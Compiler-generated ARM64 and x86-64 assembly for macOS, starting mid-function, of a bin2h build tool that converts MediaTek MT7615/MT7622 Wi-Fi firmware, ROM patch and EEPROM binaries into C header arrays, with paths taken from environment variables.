x1, [sp, #584] bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload adrp x1, l_.str.30@PAGE add x1, x1, l_.str.30@PAGEOFF str x1, [sp, #24] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF str x1, [sp, #32] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #40] ; 8-byte Folded Reload ldr x0, [sp, #72] ; 8-byte Folded Reload adrp x1, l_.str.100@PAGE add x1, x1, l_.str.100@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload adrp x1, l_.str.101@PAGE add x1, x1, l_.str.101@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload adrp x1, l_.str.32@PAGE add x1, x1, l_.str.32@PAGEOFF str x1, [sp, #48] ; 8-byte Folded Spill bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload adrp x1, l_.str.102@PAGE add x1, x1, l_.str.102@PAGEOFF bl ___strcat_chk ldr x1, [sp, #64] ; 8-byte Folded Reload ldr x2, [sp, #72] ; 8-byte Folded Reload ldr x3, [sp, #80] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload bl _bin2h ldr x1, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload bl _bzero ldr x1, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload bl _bzero ldr w1, [sp, #20] ; 4-byte Folded Reload ldr x2, [sp, #40] ; 8-byte Folded Reload ldr x0, [sp, #72] ; 8-byte Folded Reload bl _memset ldr x0, [sp, #88] ; 8-byte Folded Reload ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x1, [sp, #584] bl ___strcat_chk ldr x1, [sp, #24] ; 8-byte Folded Reload ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload ldr x1, [sp, #576] bl ___strcat_chk ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #40] ; 8-byte Folded Reload ldr x0, [sp, #72] ; 8-byte Folded Reload adrp x1, l_.str.103@PAGE add x1, x1, l_.str.103@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload adrp x1, l_.str.104@PAGE add x1, x1, l_.str.104@PAGEOFF bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload ldr x1, [sp, #592] bl ___strcat_chk ldr x1, [sp, #48] ; 8-byte Folded Reload ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload bl ___strcat_chk ldr x2, [sp, #56] ; 8-byte Folded Reload ldr x0, [sp, #64] ; 8-byte Folded Reload adrp x1, l_.str.105@PAGE add x1, x1, l_.str.105@PAGEOFF bl ___strcat_chk ldr x1, [sp, #64] ; 8-byte Folded Reload ldr x2, [sp, #72] ; 8-byte Folded Reload ldr x3, [sp, #80] ; 8-byte Folded Reload ldr x0, [sp, #88] ; 8-byte Folded Reload bl _bin2h b LBB1_36 LBB1_35: ; in Loop: Header=BB1_21 Depth=1 ldr x8, [sp, #576] mov x9, sp str x8, [x9] adrp x0, l_.str.106@PAGE add x0, x0, l_.str.106@PAGEOFF bl _printf b LBB1_36 LBB1_36: ; in Loop: Header=BB1_21 Depth=1 b LBB1_37 LBB1_37: ; in Loop: Header=BB1_21 Depth=1 ldr w8, [sp, #532] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_47 b LBB1_38 LBB1_38: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2796 bl _strlen subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_40 b LBB1_39 LBB1_39: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #3480 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #3480 add x2, sp, #2796 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_40 LBB1_40: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2156 bl _strlen subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_42 b LBB1_41 LBB1_41: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #408 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #408 add x2, sp, #2156 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_42 LBB1_42: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2028 bl _strlen subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_44 b LBB1_43 LBB1_43: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #1, lsl #12 ; =4096 add x0, x0, #3992 add x1, sp, #3992 add x2, sp, #2028 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_44 LBB1_44: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #1900 bl _strlen subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_46 b LBB1_45 LBB1_45: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #920 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #920 add x2, sp, #1900 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_46 LBB1_46: ; in Loop: Header=BB1_21 Depth=1 b LBB1_47 LBB1_47: ; in Loop: Header=BB1_21 Depth=1 ldr w8, [sp, #528] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_49 b LBB1_48 LBB1_48: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2456 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #2456 add x2, sp, #2540 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_49 LBB1_49: ; in Loop: Header=BB1_21 Depth=1 ldr w8, [sp, #520] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_51 b LBB1_50 LBB1_50: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #1944 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #1944 add x2, sp, #2412 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_51 LBB1_51: ; in Loop: Header=BB1_21 Depth=1 ldr w8, [sp, #516] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_53 b LBB1_52 LBB1_52: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #1432 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #1432 add x2, sp, #2284 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h b LBB1_53 LBB1_53: ; in Loop: Header=BB1_21 Depth=1 ldr w8, [sp, #524] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_59 b LBB1_54 LBB1_54: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #2, lsl #12 ; =8192 add x0, x0, #2968 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #2968 add x2, sp, #2668 adrp x3, l_.str.60@PAGE add x3, x3, l_.str.60@PAGEOFF bl _bin2h ldrb w8, [sp, #748] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_56 b LBB1_55 LBB1_55: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #1388 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #2968 add x2, sp, #748 adrp x3, l_.str.61@PAGE add x3, x3, l_.str.61@PAGEOFF bl _bin2h b LBB1_56 LBB1_56: ; in Loop: Header=BB1_21 Depth=1 ldrb w8, [sp, #620] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_58 b LBB1_57 LBB1_57: ; in Loop: Header=BB1_21 Depth=1 add x0, sp, #876 add x1, sp, #1, lsl #12 ; =4096 add x1, x1, #2968 add x2, sp, #620 adrp x3, l_.str.61@PAGE add x3, x3, l_.str.61@PAGEOFF bl _bin2h b LBB1_58 LBB1_58: ; in Loop: Header=BB1_21 Depth=1 b LBB1_59 LBB1_59: ; in Loop: Header=BB1_21 Depth=1 mov x0, #0 adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _strtok str x0, [sp, #576] b LBB1_21 LBB1_60: mov w0, #0 bl _exit LBB1_61: ldr w8, [sp, #616] str w8, [sp, #16] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_63 b LBB1_62 LBB1_62: bl ___stack_chk_fail LBB1_63: ldr w0, [sp, #16] ; 4-byte Folded Reload add sp, sp, #2, lsl #12 ; =8192 add sp, sp, #4000 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "r" l_.str.1: ; @.str.1 .asciz "Can't read file %s\n" l_.str.2: ; @.str.2 .asciz "Can't open write file %s\n" l_.str.3: ; @.str.3 .asciz "/* AUTO GEN PLEASE DO NOT MODIFY IT */\n" l_.str.4: ; @.str.4 .asciz "\n" l_.str.5: ; @.str.5 .asciz "UCHAR %s[] = {\n" l_.str.6: ; @.str.6 .asciz "\t" l_.str.7: ; @.str.7 .asciz " " l_.str.8: ; @.str.8 .asciz "0x" l_.str.9: ; @.str.9 .asciz "%02x" l_.str.10: ; @.str.10 .asciz "," l_.str.11: ; @.str.11 .asciz "\n};\n" l_.str.12: ; @.str.12 .asciz "RT28xx_DIR" l_.str.13: ; @.str.13 .asciz "RT28xx_BIN_DIR" l_.str.14: ; @.str.14 .asciz "CHIPSET" l_.str.15: ; @.str.15 .asciz "HAS_WOW_SUPPORT" l_.str.16: ; @.str.16 .asciz "HAS_FPGA_MODE" l_.str.17: ; @.str.17 .asciz "HAS_RX_CUT_THROUGH" l_.str.18: ; @.str.18 .asciz "RT28xx_MODE" l_.str.19: ; @.str.19 .asciz "Environment value \"RT28xx_DIR\" not export\n" l_.str.20: ; @.str.20 .asciz "Environment value \"RT28xx_BIN_DIR\" not export\n" l_.str.21: ; @.str.21 .asciz "Environment value \"CHIPSET\" not export\n" l_.str.22: ; @.str.22 .asciz "Build %s %s\n" l_.str.23: ; @.str.23 .asciz "Environment value \"HAS_FPGA_MODE\" not export\n" l_.str.24: ; @.str.24 .asciz "Environment value \"HAS_FPGA_MODE\" is too long, need less than 20\n" l_.str.25: ; @.str.25 .asciz "Environment value \"HAS_RX_CUT_THROUGH\" not export\n" l_.str.26: ; @.str.26 .asciz "Environment value \"HAS_RX_CUT_THROUGH\" is too long, need less than 20\n" l_.str.27: ; @.str.27 .asciz "Environment value \"RT28xx_DIR\" is too long!\n" l_.str.28: ; @.str.28 .asciz "Environment value \"RT28xx_BIN_DIR\" is too long!\n" l_.str.29: ; @.str.29 .asciz "chipset = %s\n" l_.str.30: ; @.str.30 .asciz "/bin/" l_.str.31: ; @.str.31 .asciz "/embedded/include/mcu/" l_.str.32: ; @.str.32 .asciz "/embedded/include/eeprom/" l_.str.33: ; @.str.33 .asciz "/" l_.str.34: ; @.str.34 .asciz "mt7615" l_.str.35: ; @.str.35 .asciz "mt7615_patch_e1_hdr.bin" l_.str.36: ; @.str.36 .asciz "mt7615_rom_patch_e1.h" l_.str.37: ; @.str.37 .asciz "mt7615_rom_patch_e1" l_.str.38: ; @.str.38 .asciz "mt7615_patch_e3_hdr.bin" l_.str.39: ; @.str.39 .asciz "mt7615_rom_patch.h" l_.str.40: ; @.str.40 .asciz "mt7615_rom_patch" l_.str.41: ; @.str.41 .asciz "y" l_.str.42: ; @.str.42 .asciz "WIFI_RAM_CODE_MT7615_FPGA.bin" l_.str.43: ; @.str.43 .asciz "WIFI_RAM_CODE_MT7615_E1.bin" l_.str.44: ; @.str.44 .asciz "WIFI_RAM_CODE_MT7615.bin" l_.str.45: ; @.str.45 .asciz "mt7615_firmware.h" l_.str.46: ; @.str.46 .asciz "MT7615_FirmwareImage" l_.str.47: ; @.str.47 .asciz "mt7615_firmware_e1.h" l_.str.48: ; @.str.48 .asciz "MT7615_FirmwareImage_E1" l_.str.49: ; @.str.49 .asciz "MT7615_cr4.bin" l_.str.50: ; @.str.50 .asciz "MT7615_cr4_noReOrdering.bin" l_.str.51: ; @.str.51 .asciz "mt7615_cr4_firmware.h" l_.str.52: ; @.str.52 .asciz "MT7615_CR4_FirmwareImage" l_.str.53: ; @.str.53 .asciz "MT7615_E2PImage1_iPAiLNA" l_.str.54: ; @.str.54 .asciz "MT7615_E2PImage2_iPAiLNA" l_.str.55: ; @.str.55 .asciz "MT7615_E2PImage3_iPAiLNA" l_.str.56: ; @.str.56 .asciz "iPAiLNA/MT7615_EEPROM1.bin" l_.str.57: ; @.str.57 .asciz "iPAiLNA/MT7615_EEPROM2.bin" l_.str.58: ; @.str.58 .asciz "iPAiLNA/MT7615_EEPROM3.bin" l_.str.59: ; @.str.59 .asciz "mt7615_e2p_iPAiLNA.h" l_.str.60: ; @.str.60 .asciz "w" l_.str.61: ; @.str.61 .asciz "a" l_.str.62: ; @.str.62 .asciz "MT7615_E2PImage1_iPAeLNA" l_.str.63: ; @.str.63 .asciz "MT7615_E2PImage2_iPAeLNA" l_.str.64: ; @.str.64 .asciz "MT7615_E2PImage3_iPAeLNA" l_.str.65: ; @.str.65 .asciz "iPAeLNA/MT7615_EEPROM1.bin" l_.str.66: ; @.str.66 .asciz "iPAeLNA/MT7615_EEPROM2.bin" l_.str.67: ; @.str.67 .asciz "iPAeLNA/MT7615_EEPROM3.bin" l_.str.68: ; @.str.68 .asciz "mt7615_e2p_iPAeLNA.h" l_.str.69: ; @.str.69 .asciz "MT7615_E2PImage1_ePAeLNA" l_.str.70: ; @.str.70 .asciz "MT7615_E2PImage2_ePAeLNA" l_.str.71: ; @.str.71 .asciz "MT7615_E2PImage3_ePAeLNA" l_.str.72: ; @.str.72 .asciz "ePAeLNA/MT7615_EEPROM1.bin" l_.str.73: ; @.str.73 .asciz "ePAeLNA/MT7615_EEPROM2.bin" l_.str.74: ; @.str.74 .asciz "ePAeLNA/MT7615_EEPROM3.bin" l_.str.75: ; @.str.75 .asciz "mt7615_e2p_ePAeLNA.h" l_.str.76: ; @.str.76 .asciz "MT7615_E2PImage1_ePAiLNA" l_.str.77: ; @.str.77 .asciz "MT7615_E2PImage2_ePAiLNA" l_.str.78: ; @.str.78 .asciz "MT7615_E2PImage3_ePAiLNA" l_.str.79: ; @.str.79 .asciz "ePAiLNA/MT7615_EEPROM1.bin" l_.str.80: ; @.str.80 .asciz "ePAiLNA/MT7615_EEPROM2.bin" l_.str.81: ; @.str.81 .asciz "ePAiLNA/MT7615_EEPROM3.bin" l_.str.82: ; @.str.82 .asciz "mt7615_e2p_ePAiLNA.h" l_.str.83: ; @.str.83 .asciz "mt7622" l_.str.84: ; @.str.84 .asciz "mt7622_patch_e1_hdr.bin" l_.str.85: ; @.str.85 .asciz "mt7622_rom_patch_e1.h" l_.str.86: ; @.str.86 .asciz "mt7622_rom_patch_e1" l_.str.87: ; @.str.87 .asciz "mt7622_patch_e2_hdr.bin" l_.str.88: ; @.str.88 .asciz "mt7622_rom_patch_e2.h" l_.str.89: ; @.str.89 .asciz "mt7622_rom_patch_e2" l_.str.90: ; @.str.90 .asciz "WIFI_RAM_CODE_MT7622_FPGA.bin" l_.str.91: ; @.str.91 .asciz "WIFI_RAM_CODE_MT7622.bin" l_.str.92: ; @.str.92 .asciz "WIFI_RAM_CODE_MT7622_E2.bin" l_.str.93: ; @.str.93 .asciz "mt7622_firmware.h" l_.str.94: ; @.str.94 .asciz "mt7622_firmware_e2.h" l_.str.95: ; @.str.95 .asciz "MT7622_FirmwareImage_E1" l_.str.96: ; @.str.96 .asciz "MT7622_FirmwareImage_E2" l_.str.97: ; @.str.97 .asciz "MT7622_E2PImage_iPAiLNA" l_.str.98: ; @.str.98 .asciz "iPAiLNA/MT7622_EEPROM.bin" l_.str.99: ; @.str.99 .asciz "mt7622_e2p_iPAiLNA.h" l_.str.100: ; @.str.100 .asciz "MT7622_E2PImage_iPAeLNA" l_.str.101: ; @.str.101 .asciz "iPAeLNA/MT7622_EEPROM.bin" l_.str.102: ; @.str.102 .asciz "mt7622_e2p_iPAeLNA.h" l_.str.103: ; @.str.103 .asciz "MT7622_E2PImage_ePAeLNA" l_.str.104: ; @.str.104 .asciz "ePAeLNA/MT7622_EEPROM.bin" l_.str.105: ; @.str.105 .asciz "mt7622_e2p_ePAeLNA.h" l_.str.106: ; @.str.106 .asciz "unknown chipset = %s\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _bin2h ## -- Begin function bin2h .p2align 4, 0x90 _bin2h: ## @bin2h .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq %rdx, -32(%rbp) movq %rcx, -40(%rbp) movl $0, -44(%rbp) movl $0, -72(%rbp) movq -16(%rbp), %rdi leaq L_.str(%rip), %rsi callq _fopen movq %rax, -56(%rbp) cmpq $0, -56(%rbp) jne LBB0_2 ## %bb.1: movq -16(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $-1, -4(%rbp) jmp LBB0_16 LBB0_2: movq -24(%rbp), %rdi movq -40(%rbp), %rsi callq _fopen movq %rax, -64(%rbp) cmpq $0, -64(%rbp) jne LBB0_4 ## %bb.3: movq -24(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq -56(%rbp), %rdi callq _fclose movl $-1, -4(%rbp) jmp LBB0_16 LBB0_4: movq -64(%rbp), %rsi leaq L_.str.3(%rip), %rdi callq _fputs movq -64(%rbp), %rsi leaq L_.str.3(%rip), %rdi callq _fputs movq -64(%rbp), %rsi leaq L_.str.4(%rip), %rdi callq _fputs movq -64(%rbp), %rsi leaq L_.str.4(%rip), %rdi callq _fputs movq -64(%rbp), %rdi movq -32(%rbp), %rdx leaq L_.str.5(%rip), %rsi movb $0, %al callq _fprintf LBB0_5: ## =>This Inner Loop Header: Depth=1 movq -56(%rbp), %rdi callq _getc ## kill: def $al killed $al killed $eax movb %al, -65(%rbp) movq -56(%rbp), %rdi callq _feof cmpl $0, %eax je LBB0_7 ## %bb.6: jmp LBB0_15 LBB0_7: ## in Loop: Header=BB0_5 Depth=1 leaq -75(%rbp), %rdi xorl %esi, %esi movl $2, %edx callq _memset cmpl $16, -72(%rbp) jl LBB0_9 ## %bb.8: ## in Loop: Header=BB0_5 Depth=1 movq -64(%rbp), %rsi leaq L_.str.4(%rip), %rdi callq _fputs movl $0, -72(%rbp) LBB0_9: ## in Loop: Header=BB0_5 Depth=1 cmpl $0, -72(%rbp) jne LBB0_11 ## %bb.10: ## in Loop: Header=BB0_5 Depth=1 movq -64(%rbp), %rsi leaq L_.str.6(%rip), %rdi callq _fputs jmp LBB0_14 LBB0_11: ## in Loop: Header=BB0_5 Depth=1 cmpl $16, -72(%rbp) jge LBB0_13 ## %bb.12: ## in Loop: Header=BB0_5 Depth=1 movq -64(%rbp), %rsi leaq L_.str.7(%rip), %rdi callq _fputs LBB0_13: ## in Loop: Header=BB0_5 Depth=1 jmp LBB0_14 LBB0_14: ## in Loop: Header=BB0_5 Depth=1 movq -64(%rbp), %rsi leaq L_.str.8(%rip), %rdi callq _fputs leaq -75(%rbp), %rdi movzbl -65(%rbp), %r8d xorl %esi, %esi movl $3, %edx leaq L_.str.9(%rip), %rcx movb $0, %al callq ___sprintf_chk leaq -75(%rbp), %rdi movq -64(%rbp), %rsi callq _fputs movq -64(%rbp), %rsi leaq L_.str.10(%rip), %rdi callq _fputs movl -72(%rbp), %eax addl $1, %eax movl %eax, -72(%rbp) jmp LBB0_5 LBB0_15: movq -64(%rbp), %rsi leaq L_.str.11(%rip), %rdi callq _fputs movq -56(%rbp), %rdi callq _fclose movq -64(%rbp), %rdi callq _fclose LBB0_16: movl -4(%rbp), %eax addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $11760, %eax ## imm = 0x2DF0 callq ____chkstk_darwin subq %rax, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -11604(%rbp) movl %edi, -11608(%rbp) movq %rsi, -11616(%rbp) movl $0, -11684(%rbp) movl $0, -11688(%rbp) movl $0, -11692(%rbp) movl $0, -11696(%rbp) movl $0, -11700(%rbp) leaq L_.str.12(%rip), %rdi callq _getenv movq %rax, -11624(%rbp) leaq L_.str.13(%rip), %rdi callq _getenv movq %rax, -11632(%rbp) leaq L_.str.14(%rip), %rdi callq _getenv movq %rax, -11640(%rbp) leaq L_.str.15(%rip), %rdi callq _getenv movq %rax, -11656(%rbp) leaq L_.str.16(%rip), %rdi callq _getenv movq %rax, -11672(%rbp) leaq L_.str.17(%rip), %rdi callq _getenv movq %rax, -11680(%rbp) leaq L_.str.18(%rip), %rdi callq _getenv movq %rax, -11664(%rbp) cmpq $0, -11624(%rbp) jne LBB1_2 ## %bb.1: leaq L_.str.19(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_2: cmpq $0, -11632(%rbp) jne LBB1_4 ## %bb.3: leaq L_.str.20(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_4: cmpq $0, -11640(%rbp) jne LBB1_6 ## %bb.5: leaq L_.str.21(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_6: cmpq $0, -11664(%rbp) je LBB1_8 ## %bb.7: movq -11640(%rbp), %rsi movq -11664(%rbp), %rdx leaq L_.str.22(%rip), %rdi movb $0, %al callq _printf LBB1_8: leaq -9232(%rbp), %rdi xorl %esi, %esi movl $1024, %edx ## imm = 0x400 callq _memset leaq -9232(%rbp), %rax movq %rax, -11720(%rbp) ## 8-byte Spill movq -11640(%rbp), %rax movq %rax, -11712(%rbp) ## 8-byte Spill movq -11640(%rbp), %rdi callq _strlen movq -11720(%rbp), %rdi ## 8-byte Reload movq -11712(%rbp), %rsi ## 8-byte Reload movq %rax, %rdx movl $1024, %ecx ## imm = 0x400 callq ___memcpy_chk movq -11640(%rbp), %rdi callq _strlen movb $0, -9232(%rbp,%rax) cmpq $0, -11672(%rbp) jne LBB1_10 ## %bb.9: leaq L_.str.23(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_10: movq -11672(%rbp), %rdi callq _strlen cmpq $19, %rax jbe LBB1_12 ## %bb.11: leaq L_.str.24(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_12: leaq -9264(%rbp), %rdi xorl %esi, %esi movl $20, %edx callq _memset leaq -9264(%rbp), %rax movq %rax, -11736(%rbp) ## 8-byte Spill movq -11672(%rbp), %rax movq %rax, -11728(%rbp) ## 8-byte Spill movq -11672(%rbp), %rdi callq _strlen movq -11736(%rbp), %rdi ## 8-byte Reload movq -11728(%rbp), %rsi ## 8-byte Reload movq %rax, %rdx movl $20, %ecx callq ___memcpy_chk movq -11672(%rbp), %rdi callq _strlen movb $0, -9264(%rbp,%rax) cmpq $0, -11680(%rbp) jne LBB1_14 ## %bb.13: leaq L_.str.25(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_14: movq -11680(%rbp), %rdi callq _strlen cmpq $19, %rax jbe LBB1_16 ## %bb.15: leaq L_.str.26(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_16: leaq -9296(%rbp), %rax movq %rax, -11752(%rbp) ## 8-byte Spill movq -11680(%rbp), %rax movq %rax, -11744(%rbp) ## 8-byte Spill movq -11680(%rbp), %rdi callq _strlen movq -11752(%rbp), %rdi ## 8-byte Reload movq -11744(%rbp), %rsi ## 8-byte Reload movq %rax, %rdx movl $20, %ecx callq ___memcpy_chk movq -11680(%rbp), %rdi callq _strlen movb $0, -9296(%rbp,%rax) movq -11624(%rbp), %rdi callq _strlen cmpq $412, %rax ## imm = 0x19C jbe LBB1_18 ## %bb.17: leaq L_.str.27(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_18: movq -11632(%rbp), %rdi callq _strlen cmpq $412, %rax ## imm = 0x19C jbe LBB1_20 ## %bb.19: leaq L_.str.28(%rip), %rdi movb $0, %al callq _printf movl $-1, -11604(%rbp) jmp LBB1_61 LBB1_20: movq -11640(%rbp), %rdi callq _strlen movb $0, -9232(%rbp,%rax) leaq -9232(%rbp), %rdi leaq L_.str.7(%rip), %rsi callq _strtok movq %rax, -11640(%rbp) LBB1_21: ## =>This Inner Loop Header: Depth=1 cmpq $0, -11640(%rbp) je LBB1_60 ## %bb.22: ## in Loop: Header=BB1_21 Depth=1 movq -11640(%rbp), %rsi leaq L_.str.29(%rip), %rdi movb $0, %al callq _printf leaq -528(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -3600(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -4112(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -3088(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -1040(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -10832(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -11344(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -4624(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -7696(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -8208(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -7184(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5136(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9424(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -10064(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -10192(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -10320(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -9552(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11472(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11600(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -1552(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -2064(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -2576(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5648(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -6160(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -6672(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9680(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -9808(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -9936(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -528(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3600(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4112(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3088(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx 